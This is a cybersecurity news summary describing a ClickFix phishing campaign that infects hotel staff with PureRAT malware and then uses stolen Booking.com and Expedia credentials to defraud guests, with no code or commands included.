A large-scale phishing campaign is actively targeting the global hospitality industry, exploiting hotel systems to deploy the PureRAT malware and ultimately compromise users of major booking platforms like Booking.com. The sophisticated attacks leverage a tactic known as ClickFix, tricking hotel staff into downloading malicious software that steals credentials. These stolen credentials are then used for further fraudulent activities, including direct attacks on hotel guests.

Key Takeaways

• A widespread phishing campaign is targeting hotels globally.

• The campaign uses the "ClickFix" social engineering tactic to deploy PureRAT malware.

• Stolen hotel credentials are used to access booking platforms like Booking.com and Expedia.

• Attackers then target hotel guests with fraudulent messages to steal financial information.

• The operation has been active since at least April 2025 and shows signs of professionalization.

The Attack Chain: From Hotels to Guests

The cybercriminals initiate their operation by compromising hotel email accounts. These compromised accounts are then used to send spear-phishing emails that impersonate legitimate entities, such as Booking.com. These emails contain malicious links designed to redirect recipients to fake websites. These sites often present a deceptive "reCAPTCHA" challenge, a hallmark of the ClickFix tactic, which prompts users to execute malicious commands, typically PowerShell scripts.

Upon execution, these scripts download and install a ZIP archive containing PureRAT, a potent remote access trojan (RAT). PureRAT is equipped with a wide array of malicious capabilities, including remote control, keylogging, webcam and microphone capture, data exfiltration, and command execution. Its modular nature and protection against reverse engineering make it a formidable tool for cybercriminals.

Exploiting Stolen Credentials for Fraud

Once the hotel systems are compromised and professional credentials for booking platforms like Booking.com and Expedia are stolen, the threat actors have two primary avenues for exploitation. They can sell these credentials on dark web forums, where they become a valuable commodity. Alternatively, they can leverage these credentials directly to send fraudulent communications to hotel guests.

These secondary attacks often involve contacting customers via email or messaging apps like WhatsApp, using legitimate reservation details to build trust. The attackers then fabricate security issues or verification problems related to bookings, urging guests to click on malicious links. These links lead to fake landing pages that mimic the appearance of legitimate booking sites, designed solely to harvest sensitive banking and payment card information.

Evolving Tactics and Professionalization

Researchers have noted that the ClickFix tactic itself is becoming increasingly sophisticated. Newer iterations of ClickFix pages incorporate elements like embedded videos, countdown timers, and OS-specific instructions to enhance their credibility and urgency. Furthermore, these pages are becoming adept at automatically copying malicious code to the user's clipboard, a technique known as clipboard hijacking, further streamlining the infection process.

The observed activity, which has been ongoing since at least April 2025 and was still active in early October 2025, demonstrates a high degree of organization and professionalization within the cybercrime ecosystem. The availability of services for acquiring hotel administrator data, selling compromised account logs, and the "malware-as-a-service" model for PureRAT all contribute to lowering the barrier to entry for these sophisticated fraud schemes.

Sources

• Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware, The Hacker News.

• Massive Phishing Campaign Targets Global Hospitality Industry Using Sophisticated ClickFix Tactics andPureRAT Malware, CXO Digitalpulse.

• ClickFix Scam Targets Hotels, Spurs Customer Attacks, Dark Reading | Security.

• “I Paid Twice” Scam Infects Booking.com Users with PureRAT via ClickFix – Hackread – Cybersecurity News, DataBreaches, Tech, AI, Crypto and More, Hackread.

• Scams and Fraud – Hackread – Cybersecurity News, Data Breaches, Tech, AI, Crypto and More, Hackread.